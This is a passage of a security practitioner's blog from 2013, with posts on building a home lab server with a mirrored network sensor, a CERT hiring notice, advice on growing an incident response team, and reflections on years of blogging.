When we popped the case open, it all looked pretty familiar and I explained the various pieces to the 12-year-olds. We removed the fan and heat sink array, which is a pretty nice low-noise setup. The case fan actually slides over the second heat sink so air blows over it on the way out the back of the chassis.
Don't forget to remove both the sticker from the heatsink and the plastic film that is on the CPU load plate before putting the CPU in the socket. After we inserted the Intel Core i7 2600, we applied thermal paste, reattached the passive cooling, and finally reattached the fan including plugging it back into the motherboard. We also inserted the four 8GB RAM sticks.
Shuttle SH67H3 motherboard with CPU and RAM installed
The fan slides over the heat sink at the rear of the chassis on the left
Next, we put the DVD/CD drive and hard drive into the tray, attached the tray to the chassis, and connected the SATA and power cables. I also added a dual Intel PRO/1000 PT NIC to give a total of three physical network interfaces. We finally tested and everything appeared to be working.


New Network Architecture


Since I was going to all this trouble to replace my three old Pentium III servers with a relatively powerful computer, I decided to take the opportunity to make a couple of other network changes. I used to run my network sensor inline, but along with the new computer I purchased a Netgear GS108T-200 smart switch. This switch has an abundance of features, including VLANs and port mirroring. Along with the new switch, all I needed was an extra WAP to reconfigure my home network as shown below.
The router/firewall also works as a WAP, but to see most client traffic I disabled it and connected an access point behind the mirroring switch
With this configuration, the switch will mirror traffic to a dedicated network interface on my network sensor. The only traffic the sensor will miss is traffic that never reaches the switch. I can also configure VLANs on the switch if I want to segment the network based on functions like management interfaces and WiFi clients.

I plan to write more about my lab setup as I continue to redevelop it. The first thing I did after testing the new box was install ESXi and create a network sensor VM using Security Onion. I may have a post about it soon.

29 March, 2013

CERT is hiring

The company I work for is hiring. For those that don't know, CERT is part of the Software Engineering Institute at Carnegie Mellon University. CERT was created in 1988 as part of the response to the Morris worm. You can find out more on CERT's "About Us" page.

If you are interested, please read more about our hiring process and browse some of the available positions. The positions are primarily in Pittsburgh with a few openings in Arlington, VA. The open positions cover network security analysis, security architecture, malware analysis, software development, vulnerability analysis, and more.

I consider our hiring process fairly grueling but also stimulating. It gives the prospective employee and prospective coworkers a good chance to really learn if the relationship will work. It is an opportunity not just for the candidate to get interviewed, but also for the candidate to interview those that already work at CERT.

One of the reasons we have so many vacant positions is because we try to maintain high standards when considering candidates. Most of our positions require a fair amount of experience and expertise. My colleagues are smart, diligent, and largely enthusiastic about their chosen professions. Don't get me wrong -- we still have bad days when we are less enthusiastic or unhappy about the state of information security, but this is a pretty cool place to work. We do a wide variety of both research and more operationally focused work, tackling a lot of big problems. We also get a fair amount of freedom to find interesting and challenging areas of work.

If I know you or know of your work, please contact me about using my name as a referral. A referral from a current CERT employee can be helpful when applying. The best way to contact me regarding a referral or to ask other questions is via email or LinkedIn. You can also post questions publicly here on my blog if that seems appropriate. In the interest of disclosure, I have an interest in recruiting people I will want to work with, but I could also potentially get a referral bonus if you list me when you apply.

11 March, 2013

Building an IR Team: Growth

This is a long overdue continuation of my posts regarding Building an Incident Response Team. I had a very rough outline of this post going all the way back to 2009! The good response I got on some of my previous posts on building IR teams made me come back and work on finishing the posts I had planned when I first started the series.

Previous posts:

I believe one of the hardest things to deal with when building a successful IR team is growth. If you build an IR team that is successful and gets management buy-in as a result, there is a good chance that responsibilities, the amount of work, the number of incidents detected, and the size of the team will all grow. This will invariably cause growing pains, setbacks, and reevaluation of procedures.

I honestly could go on and on about dealing with the growth of an IR team. There are so many things to consider that it is daunting to plan for growth ahead of time instead of just dealing with the hurdles as they come. However, if you have a team that is growing it really helps to take a step back and plan for both immediate and long-term growth. It is so important that a fair amount of this post will reiterate what I have explicitly or implicitly said in some of my previous "Building an IR Team" posts.

There are a number of questions to keep in mind when an IR team grows. What are the additional duties causing the addition of positions? Are the additional positions adequate to cover the additional duties and responsibilities? If not, how can expectations be managed so superiors understand what is actually feasible? Are the duties just a higher volume of what the team is already responsible for, or are there new areas that will require different types of team members and different types of training? What works well now that may become problematic with a larger team? Do we need to restructure? How do we maintain the success that led to the IR team's growth? The last question is one of the most fundamental.

Relationships


At one point I worked on a team that, over the course of a few years, increased the number of personnel fourfold. This completely changed the dynamics of the team, from the lead all the way down to the most junior analyst. The more people you add, the more complex the relationships become. This applies not only to relationships within the team, but also relationships with other parts of your organization and management.

With such growth, it became a lot more important to clearly define roles, responsibilities, and the command structure, and to get management support of decisions.
  • Command structure: As the team grows, other groups in the company are less likely to know each person on the team. This means in a lot of cases it is helpful to have a few key people known to those other groups. These key people don't have to always be the ones to communicate with a specific group, but can be used as a fallback if the other group's first instinct is to be more adversarial with those people they don't know.
  • Intra-team relationships: The more people you have, the more you have to keep an eye on the working relationships between members. When you have a team that numbers in the single digits, it is almost natural to know all the ins and outs of the working relationships, for example who complements each other and who can be a good mentor to more junior analysts. It takes more conscious effort to track this as the number of people increases. Not only that, it requires more actively setting expectations for each team member.
  • Management support and inter-team relationships: As a team gets bigger, its profile is raised throughout the company. This can make dealing with other groups easier, more difficult, or most likely a little bit of both. As we all know, IR teams sometimes need to make decisions or do things that are not popular and people outside the team view as irritating to say the least. It is very important to have management support when you invariably have conflicts with those outside the IR team. It's also important to have a manager that knows when to tell you that you're being unreasonable and the outside groups have a reasonable concern or complaint.
This is by no means a complete list of things to consider. The bottom line is that a larger team makes both intra- and inter-team relationships more complex.

Other Growing Pains


The simplest example I have from the past regarding growing pains was when I was on a team that was not gaining new areas of responsibility but was switching to coverage 24 hours a day, seven days a week. As I covered in another blog post, it is important to come up with the proper organization and make sure every shift is productive. Increasing the number of hours of coverage also obviously means hiring new analysts, plus the possibility of shifting current analysts to drastically different schedules.

Restructuring can often cause conflicts beyond those involving work schedules. On a small team, most people gravitate to a niche and can often be allowed to work in it as long as they can also handle the more generalized response duties. In a larger team, it's much harder to let members naturally gravitate toward certain areas while maintaining the ability to get all the work done. It certainly is nice to keep everyone happy and specializing in the areas they are most interested in, but it's not always realistic. One way to help with this is to make sure you follow the advice for redundancy in the "Organization" post, plus allow members to rotate through different areas of specialty. This means they won't be stuck in one particular area, and it provides redundancy of skills.

Another issue is making sure you formalize reporting to some degree. In a team of a few people, it's readily apparent what each person is doing. When you have a score of people, you need both formal and informal reporting from shift leads, team leads, mentors, and even individual analysts to properly understand who is doing what, their workloads, what is working well, and what is not. Regardless, the structure of a larger IR team probably needs to be more formal. Notice the "probably." I think it is safe to say there may be exceptions to all these points! The key is to find the proper balance that enables useful reporting while avoiding unneeded bureaucracy.

Hiring can also create growing pains. I must stress that you should do everything possible to maintain standards when hiring. That said, a bigger team can mean more room and opportunity for less experienced analysts. One weak link among five people is a much bigger deal than one weak link among 30, so a larger team can allow you to take a chance or two when hiring. I've always been an advocate of getting smart people that can learn and are legitimately interested in the field over those who have experience but less potential for growth, and a larger team can sometimes make this easier to justify.

Evaluation of Procedures and Operations


This advice really applies to all IR teams, but it becomes more important with growth. Incident response procedures that work well in a small team may not work as well with a larger group. Even if your team has not grown, you may want to regularly reevaluate IR workflow, reporting, or just about any existing procedures and standards of operations. Sometimes that may mean more clearly codifying what were once informal standards; other times it may mean completely rethinking how you operate because you have several tiers of analysts. Having good metrics also helps make reevaluation more objective and less subjective. Unfortunately, metrics are a huge topic that I can't address in this post, but there are many sites, papers, and books to help anyone interested in the topic.

Standards for working with the field may also need to change. If you are in an enterprise where the IR team often reaches out to "boots on the ground" like local system administrators or IT staff, there may need to be changes in areas of responsibility when the IR team is larger. I partially covered this when mentioning inter-team relationships. Even if your IR team is comfortable contacting those in the field directly, those managing the people in the field may want a more formal command structure so they can track requests and other communications from the IR team. Contacts in the field may also want their roles and responsibilities more formally or clearly defined. This is easier to work through when the IR team only has a few people, but once there are dozens it can cause problems if those in the field don't know up front what the team expects and what qualifies as an unusual request.

Training


A larger IR team means the company is spending a lot more money on the team and security in general. It also means you may have enough team members to form a class-sized group. Whether you use in-house training, outsource, or a combination, a larger team means you will need to think about more formal training where a large group is in a classroom environment. This doesn't mean one-on-one or one-on-few mentoring and training should go away, but you will need to adapt to training larger groups. You also should consider setting aside money specifically for training if that was not done previously.

Be Flexible


Note that this is all based on my experiences in the past 10 or more years, but it is just the tip of the iceberg. Different teams may have different issues to consider when growing. Depending on the specific IR team, none of what I wrote may apply directly. I think there are two overriding concerns when an IR team grows. One is to be flexible as the team grows so your organization can really see what works and what does not. Two is to plan for the growth instead of just letting it happen haphazardly. Some teams do quite well with very little change after they've grown, while some may need drastic changes just because of adding a few people or analyst turnover.

Other Resources


There are some resources available to help deal with creating IR teams, and much of what applies at creation of a team can apply to the growth of a team. When a team goes from a few people to 20-30 people, you essentially are destroying the old team and creating a new one. Most of the questions considered when creating an IR team can be asked once again and reevaluated as the team grows.
Richard Bejtlich has posted on his blog about many aspects of building and maintaining SOCs, and also mentioned that he will have a chapter in his new book titled "Network Security Monitoring Operations," focused on sharing "the author’s experience building and leading a global Computer Incident Response Team (CIRT), such that readers can apply those lessons to their own operations." I presume anyone regularly reading my blog is already reading Taosecurity, and also anticipate that his new book will be quite useful.

I hope to have at least one more post in my "Building an IR Team" series. I may also have additional material, or collate and improve all my existing posts if I feel it is worthwhile.

01 March, 2013

Reflections on Over Five Years of Blogging

My first post to this blog was in September 2007. Professionally speaking, I have gone through major changes since then. I've changed employers, though amazingly enough in this line of work that happened only once during that time. I have also learned a lot, and my duties have changed quite a bit.

Though I try to stay plugged in to incident response, NSM, and all those other operational bits I love, I am definitely a step removed from directly responding to incidents compared to a lot of my previous experience. Another big change for me is that I no longer run a bunch of NSM sensors, though I still do that type of administration on my home network. On the other hand, one of the wonderful things about my current employer is that they allow us a lot of freedom to identify problems or challenges and then take them on without trying to pigeonhole us. I look forward to 2013 as a year in which I will continue being challenged by taking on some new projects of interest to me.

I've gotten a number of links and traffic bursts from some of my past blog posts, which is flattering. I don't feel like a unique snowflake who deserves a ton of web traffic, and I don't usually get much, but occasionally I really hit the nail on the head with a technical post and get a lot of traffic and links from other bloggers. Unsurprisingly, many of my top posts are in the system administration category, since the more security-focused posts probably have a narrower target audience.

I attended FloCon 2013 in January, which made me reflect on a couple of things. First, I am going to try to blog a little more often this year. It was very flattering to talk to people at the conference who said they read my blog, or to find they were using content I had contributed to NSMWiki. When I started this blog, my two main goals were to provide references for myself and to make those references available to others in case they also found them useful. It is good to know that my blog and other public contributions have been useful to others. I would not be where I am without similar help from others, and I think that sharing of information, advice, experience, and debate is a great thing about much of the security community.

The second thing it drove home is that I need to end the semi-anonymous nature of this blog. At FloCon I found that I had coworkers following me on Twitter without even realizing it was me that they were following!

My previous employer knew about my blog and did not give me any grief whatsoever, but at the same time they were somewhat nervous about it. My current employer embraces public engagement to a much larger degree. Plenty of people already knew my name prior to this and Richard Bejtlich even linked to my blog using my name at least once, but generally I did not promote myself as the author. It is time to change that.